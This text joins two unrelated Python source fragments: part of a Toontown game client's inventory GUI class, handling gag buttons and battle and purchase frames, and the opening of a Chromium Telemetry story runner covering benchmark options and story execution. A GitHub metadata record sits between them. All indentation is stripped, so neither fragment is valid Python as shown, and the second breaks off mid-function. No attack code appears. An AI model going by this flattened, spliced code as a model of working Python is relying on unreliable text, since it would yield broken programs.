self.setPos(0.2, 0, -0.04)
self.setScale(1)
if self.storePurchaseFrame == None:
self.loadStorePurchaseFrame()
self.storePurchaseFrame.show()
self.invFrame.reparentTo(self.storePurchaseFrame)
self.invFrame.setPos(-0.23, 0, 0.505)
self.invFrame.setScale(0.81)
self.detailFrame.setPos(1.175, 0, 0)
self.detailFrame.setScale(1.25)
totalProps = self.totalProps
maxProps = self.toon.getMaxCarry()
self.deleteAllButton.show()
self.deleteEnterButton.show()
self.deleteEnterButton.setPos(-0.55, 0, -0.91)
self.deleteEnterButton.setScale(0.75)
self.deleteExitButton.hide()
self.deleteExitButton.setPos(-0.55, 0, -0.91)
self.deleteExitButton.setScale(0.75)
self.deleteEnterButton['command'] = self.setActivateMode
self.deleteEnterButton['extraArgs'] = ['storePurchaseDelete']
for track in range(len(Tracks)):
if self.toon.hasTrackAccess(track):
self.showTrack(track)
for level in range(len(Levels[track])):
button = self.buttons[track][level]
if self.itemIsUsable(track, level):
button.show()
unpaid = not base.cr.isPaid()
if self.numItem(track, level) >= self.getMax(track, level) or totalProps == maxProps or unpaid and gagIsPaidOnly(track, level) or level > LAST_REGULAR_GAG_LEVEL:
if gagIsPaidOnly(track, level):
self.makeDisabledPressable(button, track, level)
elif unpaid and gagIsVelvetRoped(track, level):
self.makeDisabledPressable(button, track, level)
else:
self.makeUnpressable(button, track, level)
elif unpaid and gagIsVelvetRoped(track, level):
self.makeDisabledPressable(button, track, level)
else:
self.makePressable(button, track, level)
else:
button.hide()
else:
self.hideTrack(track)
return
def storePurchaseDeactivateButtons(self):
self.invFrame.reparentTo(self)
self.storePurchaseFrame.hide()
def purchaseBrokeActivateButtons(self):
self.reparentTo(aspect2d)
self.setPos(0.2, 0, -0.04)
self.setScale(1)
if self.purchaseFrame == None:
self.loadPurchaseFrame()
self.purchaseFrame.show()
self.invFrame.reparentTo(self.purchaseFrame)
self.invFrame.setPos(-0.235, 0, 0.52)
self.invFrame.setScale(0.81)
self.detailFrame.setPos(1.17, 0, -0.02)
self.detailFrame.setScale(1.25)
self.deleteAllButton.show()
self.deleteEnterButton.show()
self.deleteEnterButton.setPos(-0.441, 0, -0.917)
self.deleteEnterButton.setScale(0.75)
self.deleteExitButton.hide()
self.deleteExitButton.setPos(-0.441, 0, -0.917)
self.deleteExitButton.setScale(0.75)
if self.gagTutMode:
self.deleteEnterButton.hide()
for track in range(len(Tracks)):
if self.toon.hasTrackAccess(track):
self.showTrack(track)
for level in range(len(Levels[track])):
button = self.buttons[track][level]
if self.itemIsUsable(track, level):
button.show()
if not self.gagTutMode:
self.makeUnpressable(button, track, level)
else:
button.hide()
else:
self.hideTrack(track)
return
def purchaseBrokeDeactivateButtons(self):
self.invFrame.reparentTo(self)
self.purchaseFrame.hide()
def gagTutDisabledActivateButtons(self):
self.reparentTo(aspect2d)
self.setPos(0.2, 0, -0.04)
self.setScale(1)
if self.purchaseFrame == None:
self.loadPurchaseFrame()
self.purchaseFrame.show()
self.invFrame.reparentTo(self.purchaseFrame)
self.invFrame.setPos(-0.235, 0, 0.52)
self.invFrame.setScale(0.81)
self.detailFrame.setPos(1.17, 0, -0.02)
self.detailFrame.setScale(1.25)
self.deleteExitButton.hide()
self.deleteEnterButton.hide()
self.deleteAllButton.hide()
def gagTutDisabledDeactivateButtons(self):
self.invFrame.reparentTo(self)
self.purchaseFrame.hide()
def battleActivateButtons(self):
self.stopAndClearPropBonusIval()
self.reparentTo(aspect2d)
self.setPos(0, 0, 0.1)
self.setScale(1)
if self.battleFrame == None:
self.loadBattleFrame()
self.battleFrame.show()
self.battleFrame.setScale(0.9)
self.invFrame.reparentTo(self.battleFrame)
self.invFrame.setPos(0, 0, -0.25)
self.invFrame.setScale(1)
self.detailFrame.setPos(1.125, 0, -0.15)
self.detailFrame.setScale(1)
self.deleteAllButton.hide()
self.deleteEnterButton.hide()
self.deleteExitButton.hide()
if self.bldg == 1:
self.runButton.hide()
self.sosButton.show()
self.passButton.show()
self.levelsButton.show()
elif self.tutorialFlag == 1:
self.runButton.hide()
self.sosButton.hide()
self.passButton.hide()
self.fireButton.hide()
self.levelsButton.hide()
else:
self.runButton.show()
self.sosButton.show()
self.passButton.show()
self.fireButton.show()
self.levelsButton.show()
if localAvatar.getPinkSlips() > 0:
self.fireButton['state'] = DGG.NORMAL
self.fireButton['image_color'] = Vec4(0, 0.6, 1, 1)
else:
self.fireButton['state'] = DGG.DISABLED
self.fireButton['image_color'] = Vec4(0.4, 0.4, 0.4, 1)
if settings.get('show-cog-levels', True):
self.levelsButton['text'] = TTLocalizer.InventoryLevelsHide
else:
self.levelsButton['text'] = TTLocalizer.InventoryLevelsShow
for track in range(len(Tracks)):
if self.toon.hasTrackAccess(track):
self.showTrack(track)
for level in range(len(Levels[track])):
button = self.buttons[track][level]
if self.itemIsUsable(track, level):
unpaid = not base.cr.isPaid()
button.show()
if self.numItem(track, level) <= 0 or track == HEAL_TRACK and not self.heal or track == TRAP_TRACK and not self.trap or track == LURE_TRACK and not self.lure:
self.makeUnpressable(button, track, level)
elif unpaid and gagIsVelvetRoped(track, level):
self.makeDisabledPressable(button, track, level)
elif self.itemIsCredit(track, level):
self.makePressable(button, track, level)
else:
self.makeNoncreditPressable(button, track, level)
else:
button.hide()
else:
self.hideTrack(track)
self.propBonusIval.loop()
return
def battleDeactivateButtons(self):
self.invFrame.reparentTo(self)
self.levelsButton.hide()
self.battleFrame.hide()
self.stopAndClearPropBonusIval()
def plantTreeActivateButtons(self):
self.reparentTo(aspect2d)
self.setPos(0, 0, 0.1)
self.setScale(1)
if self.battleFrame == None:
self.loadBattleFrame()
self.battleFrame.show()
self.battleFrame.setScale(0.9)
self.invFrame.reparentTo(self.battleFrame)
self.invFrame.setPos(-0.25, 0, 0.35)
self.invFrame.setScale(1)
self.detailFrame.setPos(1.125, 0, -0.08)
self.detailFrame.setScale(1)
self.deleteAllButton.hide()
self.deleteEnterButton.hide()
self.deleteExitButton.hide()
self.runButton.hide()
self.sosButton.hide()
self.levelsButton.hide()
self.passButton['text'] = TTLocalizer.lCancel
self.passButton.show()
for track in range(len(Tracks)):
if self.toon.hasTrackAccess(track):
self.showTrack(track)
for level in range(len(Levels[track])):
button = self.buttons[track][level]
if self.itemIsUsable(track, level) and (level == 0 or self.toon.doIHaveRequiredTrees(track, level)):
button.show()
self.makeUnpressable(button, track, level)
if self.numItem(track, level) > 0:
if not self.toon.isTreePlanted(track, level):
self.makePressable(button, track, level)
else:
button.hide()
else:
self.hideTrack(track)
return
def plantTreeDeactivateButtons(self):
self.passButton['text'] = TTLocalizer.InventoryPass
self.invFrame.reparentTo(self)
self.levelsButton.hide()
self.battleFrame.hide()
def itemIsUsable(self, track, level):
if self.gagTutMode:
trackAccess = self.toon.getTrackAccess()
return trackAccess[track] >= level + 1
curSkill = self.toon.experience.getExp(track)
if curSkill < Levels[track][level]:
return 0
else:
return 1
def itemIsCredit(self, track, level):
if self.toon.earnedExperience:
if self.toon.earnedExperience[track] >= ExperienceCap:
return 0
if self.battleCreditLevel == None:
return 1
else:
return level < self.battleCreditLevel
return
def getMax(self, track, level):
if self.gagTutMode and (track not in (4, 5) or level > 0):
return 1
return InventoryBase.InventoryBase.getMax(self, track, level)
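# getCurAndNextExpValues() below returns the toon's current experience in a
# track together with the threshold of the next gag level. For example
# (hypothetical numbers), with Levels[track] == (0, 10, 50, 400, ...) and 75
# experience it yields (75, 400); a fully maxed track yields
# (curSkill, MaxSkill).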
def getCurAndNextExpValues(self, track):
curSkill = self.toon.experience.getExp(track)
retVal = MaxSkill
for amount in Levels[track]:
if curSkill < amount:
retVal = amount
return (curSkill, retVal)
return (curSkill, retVal)
def makePressable(self, button, track, level):
organicBonus = self.toon.checkGagBonus(track, level)
propBonus = self.checkPropBonus(track)
bonus = organicBonus or propBonus
if bonus:
shadowColor = self.ShadowBuffedColor
else:
shadowColor = self.ShadowColor
button.configure(image0_image=self.upButton, image2_image=self.rolloverButton, text_shadow=shadowColor, geom_color=self.PressableGeomColor, commandButtons=(DGG.LMB,))
if self._interactivePropTrackBonus == track:
button.configure(image_color=self.PropBonusPressableImageColor)
self.addToPropBonusIval(button)
else:
button.configure(image_color=self.PressableImageColor)
def makeDisabledPressable(self, button, track, level):
organicBonus = self.toon.checkGagBonus(track, level)
propBonus = self.checkPropBonus(track)
bonus = organicBonus or propBonus
if bonus:
shadowColor = self.UnpressableShadowBuffedColor
else:
shadowColor = self.ShadowColor
button.configure(text_shadow=shadowColor, geom_color=self.UnpressableGeomColor, image_image=self.flatButton, commandButtons=(DGG.LMB,))
button.configure(image_color=self.UnpressableImageColor)
def makeNoncreditPressable(self, button, track, level):
organicBonus = self.toon.checkGagBonus(track, level)
propBonus = self.checkPropBonus(track)
bonus = organicBonus or propBonus
if bonus:
shadowColor = self.ShadowBuffedColor
else:
shadowColor = self.ShadowColor
button.configure(image0_image=self.upButton, image2_image=self.rolloverButton, text_shadow=shadowColor, geom_color=self.PressableGeomColor, commandButtons=(DGG.LMB,))
if self._interactivePropTrackBonus == track:
button.configure(image_color=self.PropBonusNoncreditPressableImageColor)
self.addToPropBonusIval(button)
else:
button.configure(image_color=self.NoncreditPressableImageColor)
def makeDeletePressable(self, button, track, level):
organicBonus = self.toon.checkGagBonus(track, level)
propBonus = self.checkPropBonus(track)
bonus = organicBonus or propBonus
if bonus:
shadowColor = self.ShadowBuffedColor
else:
shadowColor = self.ShadowColor
button.configure(image0_image=self.upButton, image2_image=self.rolloverButton, text_shadow=shadowColor, geom_color=self.PressableGeomColor, commandButtons=(DGG.LMB,))
button.configure(image_color=self.DeletePressableImageColor)
def makeUnpressable(self, button, track, level):
organicBonus = self.toon.checkGagBonus(track, level)
propBonus = self.checkPropBonus(track)
bonus = organicBonus or propBonus
if bonus:
shadowColor = self.UnpressableShadowBuffedColor
else:
shadowColor = self.ShadowColor
button.configure(text_shadow=shadowColor, geom_color=self.UnpressableGeomColor, image_image=self.flatButton, commandButtons=())
button.configure(image_color=self.UnpressableImageColor)
def makeBookUnpressable(self, button, track, level):
organicBonus = self.toon.checkGagBonus(track, level)
propBonus = self.checkPropBonus(track)
bonus = organicBonus or propBonus
if bonus:
shadowColor = self.ShadowBuffedColor
else:
shadowColor = self.ShadowColor
button.configure(text_shadow=shadowColor, geom_color=self.BookUnpressableGeomColor, image_image=self.flatButton, commandButtons=())
button.configure(image0_color=self.BookUnpressableImage0Color, image2_color=self.BookUnpressableImage2Color)
def hideTrack(self, trackIndex):
self.trackNameLabels[trackIndex].hide()
self.trackBars[trackIndex].hide()
self.trackRows[trackIndex].hide()
for levelIndex in xrange(0, len(Levels[trackIndex])):
self.buttons[trackIndex][levelIndex].hide()
def showTrack(self, trackIndex):
self.trackNameLabels[trackIndex].show()
self.trackBars[trackIndex].show()
self.trackRows[trackIndex].show()
for levelIndex in xrange(0, len(Levels[trackIndex])):
self.buttons[trackIndex][levelIndex].show()
curExp, nextExp = self.getCurAndNextExpValues(trackIndex)
if curExp >= regMaxSkill:
self.trackBars[trackIndex]['range'] = UberSkill
self.trackBars[trackIndex]['text'] = TTLocalizer.InventoryUberTrackExp % {'nextExp': MaxSkill - curExp}
else:
self.trackBars[trackIndex]['range'] = nextExp
self.trackBars[trackIndex]['text'] = TTLocalizer.InventoryTrackExp % {'curExp': curExp,
'nextExp': nextExp}
def updateInvString(self, invString):
InventoryBase.InventoryBase.updateInvString(self, invString)
self.updateGUI()
return None
def updateButton(self, track, level):
button = self.buttons[track][level]
button['text'] = str(self.numItem(track, level))
organicBonus = self.toon.checkGagBonus(track, level)
propBonus = self.checkPropBonus(track)
bonus = organicBonus or propBonus
if bonus:
textScale = 0.05
else:
textScale = 0.04
button.configure(text_scale=textScale)
def buttonBoing(self, track, level):
button = self.buttons[track][level]
oldScale = button.getScale()
s = Sequence(button.scaleInterval(0.1, oldScale * 1.333, blendType='easeOut'), button.scaleInterval(0.1, oldScale, blendType='easeIn'), name='inventoryButtonBoing-' + str(self.this))
s.start()
def updateGUI(self, track = None, level = None):
self.updateTotalPropsText()
if track == None and level == None:
for track in range(len(Tracks)):
curExp, nextExp = self.getCurAndNextExpValues(track)
if curExp >= UnpaidMaxSkills[track] and self.toon.getGameAccess() != OTPGlobals.AccessFull:
self.trackBars[track]['range'] = nextExp
self.trackBars[track]['text'] = TTLocalizer.InventoryGuestExp
elif curExp >= regMaxSkill:
self.trackBars[track]['text'] = TTLocalizer.InventoryUberTrackExp % {'nextExp': MaxSkill - curExp}
self.trackBars[track]['value'] = curExp - regMaxSkill
else:
self.trackBars[track]['text'] = TTLocalizer.InventoryTrackExp % {'curExp': curExp,
'nextExp': nextExp}
self.trackBars[track]['value'] = curExp
for level in range(0, len(Levels[track])):
self.updateButton(track, level)
for x in xrange(0, len(Tracks)):
if self.toon.hasTrackAccess(x):
self.trackTabs[x].show()
else:
self.trackTabs[x].hide()
elif track != None and level != None:
self.updateButton(track, level)
else:
self.notify.error('Invalid use of updateGUI')
self.doTab(self.activeTab)
self.__activateButtons()
return
def getSingleGroupStr(self, track, level):
if track == HEAL_TRACK:
if isGroup(track, level):
return TTLocalizer.InventoryAffectsAllToons
else:
return TTLocalizer.InventoryAffectsOneToon
elif isGroup(track, level):
return TTLocalizer.InventoryAffectsAllCogs
else:
return TTLocalizer.InventoryAffectsOneCog
def getToonupDmgStr(self, track, level):
if track == HEAL_TRACK:
return TTLocalizer.InventoryHealString
elif track == LURE_TRACK:
return TTLocalizer.InventoryLureString
else:
return TTLocalizer.InventoryDamageString
def deleteItem(self, track, level):
if self.numItem(track, level) > 0:
self.useItem(track, level)
self.updateGUI(track, level)
def loadBattleFrame(self):
battleModels = loader.loadModel('phase_3.5/models/gui/battle_gui_new')
self.levelsButton = DirectButton(self, relief=None, pos=(0.675, 0, -0.5), text='', text_scale=TTLocalizer.INlevelsButton, text_fg=Vec4(1, 1, 1, 1), textMayChange=1, image=(self.upButton, self.downButton, self.rolloverButton), image_scale=(2.5, 1.05, 1), image_color=(1, 0.6, 0, 1), command=self.__handleLevels)
self.battleFrame = DirectFrame(relief=None, parent=self)
self.runButton = DirectButton(parent=self.battleFrame, relief=None, pos=(1.4, 0, -0.5), text=TTLocalizer.InventoryRun, text_scale=TTLocalizer.INrunButton, text_pos=(0, -0.02), text_fg=Vec4(1, 1, 1, 1), textMayChange=0, image=(self.upButton, self.downButton, self.rolloverButton), image_scale=(2, 1.05, 1), image_color=(0, 0.6, 1, 1), command=self.__handleRun)
self.sosButton = DirectButton(parent=self.battleFrame, relief=None, pos=(1.45, 0, -0.7), text=TTLocalizer.InventorySOS, text_scale=0.05, text_pos=(0, -0.02), text_fg=Vec4(1, 1, 1, 1), textMayChange=0, image=(self.upButton, self.downButton, self.rolloverButton), image_scale=(2, 1.05, 1), image_color=(0, 0.6, 1, 1), command=self.__handleSOS)
self.passButton = DirectButton(parent=self.battleFrame, relief=None, pos=(1.45, 0, -0.6), text=TTLocalizer.InventoryPass, text_scale=TTLocalizer.INpassButton, text_pos=(0, -0.02), text_fg=Vec4(1, 1, 1, 1), textMayChange=1, image=(self.upButton, self.downButton, self.rolloverButton), image_scale=(2, 1.05, 1), image_color=(0, 0.6, 1, 1), command=self.__handlePass)
self.fireButton = DirectButton(parent=self.battleFrame, relief=None, pos=(1.4, 0, -0.8), text=TTLocalizer.InventoryFire, text_scale=TTLocalizer.INfireButton, text_pos=(0, -0.02), text_fg=Vec4(1, 1, 1, 1), textMayChange=0, image=(self.upButton, self.downButton, self.rolloverButton), image_scale=(2, 1.05, 1), image_color=(0, 0.6, 1, 1), command=self.__handleFire)
self.tutText = DirectFrame(parent=self.battleFrame, relief=None, pos=(-1, 0, -0.1133), scale=0.143, image=DGG.getDefaultDialogGeom(), image_scale=5.125, image_pos=(0, 0, -0.65), image_color=ToontownGlobals.GlobalDialogColor, text_scale=TTLocalizer.INclickToAttack, text=TTLocalizer.InventoryClickToAttack, textMayChange=0)
self.tutText.hide()
self.tutArrows = BlinkingArrows.BlinkingArrows(parent=self.battleFrame)
battleModels.removeNode()
self.levelsButton.hide()
self.battleFrame.hide()
return
def loadPurchaseFrame(self):
self.purchaseFrame = DirectFrame(relief=None, parent=self)
self.purchaseFrame.setX(-.06)
self.purchaseFrame.hide()
return
def loadStorePurchaseFrame(self):
self.storePurchaseFrame = DirectFrame(relief=None, parent=self)
self.storePurchaseFrame.hide()
return
def buttonLookup(self, track, level):
return self.invModels[track][level]
def enterTrackFrame(self, track, guiItem):
messenger.send('enterTrackFrame', [track])
def exitTrackFrame(self, track, guiItem):
messenger.send('exitTrackFrame', [track])
def checkPropBonus(self, track):
result = False
if track == self._interactivePropTrackBonus:
result = True
return result
def stopAndClearPropBonusIval(self):
if self.propBonusIval and self.propBonusIval.isPlaying():
self.propBonusIval.finish()
self.propBonusIval = Parallel(name='dummyPropBonusIval')
def addToPropBonusIval(self, button):
flashObject = button
try:
flashObject = button.component('image0')
except:
pass
goDark = LerpColorScaleInterval(flashObject, 0.5, Point4(0.1, 0.1, 0.1, 1.0), Point4(1, 1, 1, 1), blendType='easeIn')
goBright = LerpColorScaleInterval(flashObject, 0.5, Point4(1, 1, 1, 1), Point4(0.1, 0.1, 0.1, 1.0), blendType='easeOut')
newSeq = Sequence(goDark, goBright, Wait(0.2))
self.propBonusIval.append(newSeq)
|
{
"content_hash": "53af7a09c8fd059b7549ccd597ea0d2d",
"timestamp": "",
"source": "github",
"line_count": 1347,
"max_line_length": 471,
"avg_line_length": 46.01187824795843,
"alnum_prop": 0.6103778760205234,
"repo_name": "silly-wacky-3-town-toon/SOURCE-COD",
"id": "7e4a6abc7d54aaa0a587b425fcf98d18b4978955",
"size": "61978",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "toontown/toon/InventoryNewNEW.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "10249"
},
{
"name": "C",
"bytes": "1752256"
},
{
"name": "C#",
"bytes": "8440"
},
{
"name": "C++",
"bytes": "5485400"
},
{
"name": "Emacs Lisp",
"bytes": "210083"
},
{
"name": "F#",
"bytes": "2310"
},
{
"name": "Forth",
"bytes": "506"
},
{
"name": "GLSL",
"bytes": "1040"
},
{
"name": "JavaScript",
"bytes": "7003"
},
{
"name": "Makefile",
"bytes": "895"
},
{
"name": "Mask",
"bytes": "969"
},
{
"name": "NSIS",
"bytes": "1009050"
},
{
"name": "Objective-C",
"bytes": "21821"
},
{
"name": "PLSQL",
"bytes": "10200"
},
{
"name": "Pascal",
"bytes": "4986"
},
{
"name": "Perl6",
"bytes": "30612"
},
{
"name": "Puppet",
"bytes": "259"
},
{
"name": "Python",
"bytes": "33566014"
},
{
"name": "Shell",
"bytes": "14642"
},
{
"name": "Tcl",
"bytes": "2084458"
}
],
"symlink_target": ""
}
|
from __future__ import print_function
from __future__ import absolute_import
import contextlib
import itertools
import logging
import optparse # pylint: disable=deprecated-module
import os
import re
import sys
import time
try:
import psutil
except ImportError:
psutil = None
import py_utils
from py_utils import cloud_storage # pylint: disable=import-error
from py_utils import logging_util # pylint: disable=import-error
from py_utils.constants import exit_codes
from telemetry.core import exceptions
from telemetry.internal.actions import page_action
from telemetry.internal.browser import browser_finder
from telemetry.internal.browser import browser_finder_exceptions
from telemetry.internal.results import results_options
from telemetry.internal.util import exception_formatter
from telemetry import page
from telemetry.page import legacy_page_test
from telemetry.story import story_filter as story_filter_module
from telemetry.util import wpr_modes
from telemetry.web_perf import story_test
# Allowed stages to pause for user interaction at.
_PAUSE_STAGES = ('before-start-browser', 'after-start-browser',
'before-run-story', 'after-run-story')
_UNHANDLEABLE_ERRORS = (
SystemExit,
KeyboardInterrupt,
ImportError,
MemoryError)
# Benchmark names must match this regex. Note it has to be kept in sync with
# the corresponding pattern defined in tools/perf/core/perf_data_generator.py.
_RE_VALID_TEST_SUITE_NAME = r'^[\w._-]+$'
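# For example, a benchmark named 'speedometer2.desktop' (illustrative) is
# accepted, while names containing spaces or slashes are rejected by
# RunBenchmark() below.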
class ArchiveError(Exception):
pass
def AddCommandLineArgs(parser):
story_filter_module.StoryFilterFactory.AddCommandLineArgs(parser)
group = optparse.OptionGroup(parser, 'Story runner options')
# Note that the default for pageset-repeat is 1 unless the benchmark
# specifies a different default by adding
# `options = {'pageset_repeat': X}` in their benchmark. Defaults are always
# overridden by passed-in command line arguments.
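# For illustration, a benchmark subclass could declare
#   options = {'pageset_repeat': 3}
# as a class attribute to run every story three times unless the flag below
# overrides it.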
group.add_option('--pageset-repeat', default=1, type='int',
help='Number of times to repeat the entire pageset. ')
# TODO(crbug.com/910809): Add flag to reduce iterations to 1.
# (An iteration is a repeat of the benchmark without restarting Chrome. It
# must be supported in benchmark-specific code.) This supports the smoke
# test use case since we don't want to waste time with iterations in smoke
# tests.
group.add_option('--max-failures', default=None, type='int',
help='Maximum number of test failures before aborting '
'the run. Defaults to the number specified by the '
'PageTest.')
group.add_option('--pause', dest='pause', default=None,
choices=_PAUSE_STAGES,
help='Pause for interaction at the specified stage. '
'Valid stages are %s.' % ', '.join(_PAUSE_STAGES))
group.add_option('--suppress-gtest-report', action='store_true',
help='Suppress gtest style report of progress as stories '
'are being run.')
group.add_option('--skip-typ-expectations-tags-validation',
action='store_true',
help='Suppress typ expectation tags validation errors.')
parser.add_option_group(group)
group = optparse.OptionGroup(parser, 'Web Page Replay options')
group.add_option(
'--use-live-sites',
dest='use_live_sites', action='store_true',
help='Run against live sites and ignore the Web Page Replay archives.')
parser.add_option_group(group)
parser.add_option('-p', '--print-only', dest='print_only',
choices=['stories', 'tags', 'both'], default=None)
parser.add_option('-w', '--wait-for-cpu-temp',
dest='wait_for_cpu_temp', action='store_true',
default=False,
help='Introduces a wait between each story '
'until the device CPU has cooled down. If '
'not specified, this wait is disabled. '
'Device must be supported. ')
def ProcessCommandLineArgs(parser, args, environment=None):
story_filter_module.StoryFilterFactory.ProcessCommandLineArgs(
parser, args, environment)
if args.pageset_repeat < 1:
parser.error('--pageset-repeat must be a positive integer.')
@contextlib.contextmanager
def CaptureLogsAsArtifacts(results):
with results.CreateArtifact('logs.txt') as log_file:
with logging_util.CaptureLogs(log_file):
yield
def _RunStoryAndProcessErrorIfNeeded(
story, results, state, test, finder_options):
def ProcessError(log_message):
logging.exception(log_message)
state.DumpStateUponStoryRunFailure(results)
# Note: calling Fail on the results object also normally causes the
# progress_reporter to log it in the output.
results.Fail('Exception raised running %s' % story.name)
with CaptureLogsAsArtifacts(results):
try:
has_existing_exception = False
if isinstance(test, story_test.StoryTest):
test.WillRunStory(state.platform, story)
state.WillRunStory(story)
if not state.CanRunStory(story):
results.Skip(
'Skipped because story is not supported '
'(SharedState.CanRunStory() returns False).')
return
if hasattr(state, 'browser') and state.browser:
state.browser.CleanupUnsymbolizedMinidumps()
story.wpr_mode = state.wpr_mode
if finder_options.periodic_screenshot_frequency_ms:
state.browser.StartCollectingPeriodicScreenshots(
finder_options.periodic_screenshot_frequency_ms)
state.RunStory(results)
if isinstance(test, story_test.StoryTest):
test.Measure(state.platform, results)
except page_action.PageActionNotSupported as exc:
has_existing_exception = True
results.Skip('Unsupported page action: %s' % exc)
except (legacy_page_test.Failure, exceptions.TimeoutException,
exceptions.LoginException, py_utils.TimeoutException):
has_existing_exception = True
ProcessError(log_message='Handleable error')
except _UNHANDLEABLE_ERRORS:
has_existing_exception = True
ProcessError(log_message=('Unhandleable error. '
'Benchmark run will be interrupted'))
raise
except Exception: # pylint: disable=broad-except
has_existing_exception = True
ProcessError(log_message=('Possibly handleable error. '
'Will try to restart shared state'))
# The caller, RunStorySet, will catch this exception, destroy and
# create a new shared state.
raise
finally:
if finder_options.periodic_screenshot_frequency_ms:
state.browser.StopCollectingPeriodicScreenshots()
try:
if hasattr(state, 'browser') and state.browser:
try:
state.browser.CleanupUnsymbolizedMinidumps(fatal=True)
except Exception: # pylint: disable=broad-except
exception_formatter.PrintFormattedException(
msg='Exception raised when cleaning unsymbolized minidumps: ')
state.DumpStateUponStoryRunFailure(results)
results.Fail(sys.exc_info())
# We attempt to stop tracing and/or metric collecting before possibly
# closing the browser. Closing the browser first and stopping tracing
# later appeared to cause issues where subsequent browser instances
# would not launch correctly on some devices (see: crbug.com/720317).
# The following normally cause tracing and/or metric collecting to stop.
if isinstance(test, story_test.StoryTest):
test.DidRunStory(state.platform, results)
else:
test.DidRunPage(state.platform)
# And the following normally causes the browser to be closed.
state.DidRunStory(results)
except Exception: # pylint: disable=broad-except
if not has_existing_exception:
state.DumpStateUponStoryRunFailure(results)
raise
# Print current exception and propagate existing exception.
exception_formatter.PrintFormattedException(
msg='Exception raised when cleaning story run: ')
def _GetPossibleBrowser(finder_options):
"""Return a possible_browser with the given options."""
possible_browser = browser_finder.FindBrowser(finder_options)
if not possible_browser:
raise browser_finder_exceptions.BrowserFinderException(
'Cannot find browser of type %s. \n\nAvailable browsers:\n%s\n' % (
finder_options.browser_options.browser_type,
'\n'.join(browser_finder.GetAllAvailableBrowserTypes(
finder_options))))
finder_options.browser_options.browser_type = possible_browser.browser_type
return possible_browser
def RunStorySet(test, story_set, finder_options, results,
max_failures=None, found_possible_browser=None):
"""Runs a test against a story_set with the given options.
Stop execution for unexpected exceptions such as KeyboardInterrupt. Some
other exceptions are handled and recorded before allowing the remaining
stories to run.
Args:
test: Either a StoryTest or a LegacyPageTest instance.
story_set: A StorySet instance with the set of stories to run.
finder_options: The parsed command line options to customize the run.
results: A PageTestResults object used to collect results and artifacts.
max_failures: Max number of story run failures allowed before aborting
the entire story run. It's overridden by finder_options.max_failures
if given.
found_possible_browser: The possible browser to use. If this is given,
browser discovery is skipped.
"""
stories = story_set.stories
for s in stories:
ValidateStory(s)
if found_possible_browser:
possible_browser = found_possible_browser
finder_options.browser_options.browser_type = possible_browser.browser_type
else:
possible_browser = _GetPossibleBrowser(finder_options)
if (finder_options.periodic_screenshot_frequency_ms and
possible_browser.target_os == "android"):
raise ValueError("Periodic screenshots are not compatible with Android!")
logging.info('Running in Python version: %s' % str(sys.version_info))
platform_tags = possible_browser.GetTypExpectationsTags()
logging.info('The following expectations condition tags were generated %s',
str(platform_tags))
abridged_story_set_tag = story_set.GetAbridgedStorySetTagFilter()
story_filter = story_filter_module.StoryFilterFactory.BuildStoryFilter(
results.benchmark_name, platform_tags, abridged_story_set_tag)
stories = story_filter.FilterStories(stories)
wpr_archive_info = story_set.wpr_archive_info
# Sort the stories based on the archive name, to minimize how often the
# network replay-server needs to be restarted.
if wpr_archive_info:
stories = sorted(
stories,
key=lambda story: wpr_archive_info.WprFilePathForStory(story) or '')
if finder_options.print_only:
if finder_options.print_only == 'tags':
tags = set(itertools.chain.from_iterable(s.tags for s in stories))
print('List of tags:\n%s' % '\n'.join(tags))
return
include_tags = finder_options.print_only == 'both'
if include_tags:
format_string = ' %%-%ds %%s' % max(len(s.name) for s in stories)
else:
format_string = '%s%s'
for s in stories:
print(format_string % (s.name, ','.join(s.tags) if include_tags else ''))
return
if (not finder_options.use_live_sites and
finder_options.browser_options.wpr_mode != wpr_modes.WPR_RECORD):
# Get the serving dirs of the filtered stories.
# TODO(crbug.com/883798): removing story_set._serving_dirs
serving_dirs = story_set._serving_dirs.copy()
for story in stories:
if story.serving_dir:
serving_dirs.add(story.serving_dir)
if story_set.bucket:
for directory in serving_dirs:
cloud_storage.GetFilesInDirectoryIfChanged(directory,
story_set.bucket)
if story_set.archive_data_file and not _UpdateAndCheckArchives(
story_set.archive_data_file, wpr_archive_info, stories, story_filter):
return
if not stories:
return
if psutil:
# Log available disk space before running the benchmark.
logging.info(
'Disk usage before running tests: %s.' % str(psutil.disk_usage('.')))
# Effective max failures gives priority to command-line flag value.
effective_max_failures = finder_options.max_failures
if effective_max_failures is None:
effective_max_failures = max_failures
state = None
# TODO(crbug.com/866458): unwind the nested blocks
# pylint: disable=too-many-nested-blocks
try:
has_existing_exception = False
pageset_repeat = finder_options.pageset_repeat
for storyset_repeat_counter in range(pageset_repeat):
for story in stories:
if not state:
# Construct shared state by using a copy of finder_options. Shared
# state may update the finder_options. If we tear down the shared
# state after this story run, we want to construct the shared
# state for the next story from the original finder_options.
state = story_set.shared_state_class(
test, finder_options.Copy(), story_set, possible_browser)
with results.CreateStoryRun(story, storyset_repeat_counter):
skip_reason = story_filter.ShouldSkip(story)
if skip_reason:
results.Skip(skip_reason)
continue
if results.benchmark_interrupted:
results.Skip(results.benchmark_interruption, expected=False)
continue
try:
if state.platform:
state.platform.WaitForBatteryTemperature(35)
if finder_options.wait_for_cpu_temp:
state.platform.WaitForCpuTemperature(38.0)
_WaitForThermalThrottlingIfNeeded(state.platform)
_RunStoryAndProcessErrorIfNeeded(story, results, state, test,
finder_options)
except _UNHANDLEABLE_ERRORS as exc:
has_existing_exception = True
interruption = (
'Benchmark execution interrupted by a fatal exception: %r' %
exc)
results.InterruptBenchmark(interruption)
exception_formatter.PrintFormattedException()
except Exception: # pylint: disable=broad-except
has_existing_exception = True
logging.exception('Exception raised during story run.')
results.Fail(sys.exc_info())
# For all other errors, try to give the rest of stories a chance
# to run by tearing down the state and creating a new state
# instance in the next iteration.
try:
# If TearDownState raises, do not catch the exception.
# (The Error was saved as a failure value.)
state.TearDownState()
except Exception as exc: # pylint: disable=broad-except
interruption = (
'Benchmark execution interrupted by a fatal exception: %r' %
exc)
results.InterruptBenchmark(interruption)
exception_formatter.PrintFormattedException()
finally:
# Later finally-blocks use state, so ensure it is cleared.
state = None
finally:
if state and state.platform:
_CheckThermalThrottling(state.platform)
if (effective_max_failures is not None and
results.num_failed > effective_max_failures):
interruption = (
'Too many stories failed. Aborting the rest of the stories.')
results.InterruptBenchmark(interruption)
finally:
if state:
try:
state.TearDownState()
except Exception: # pylint: disable=broad-except
if not has_existing_exception:
raise
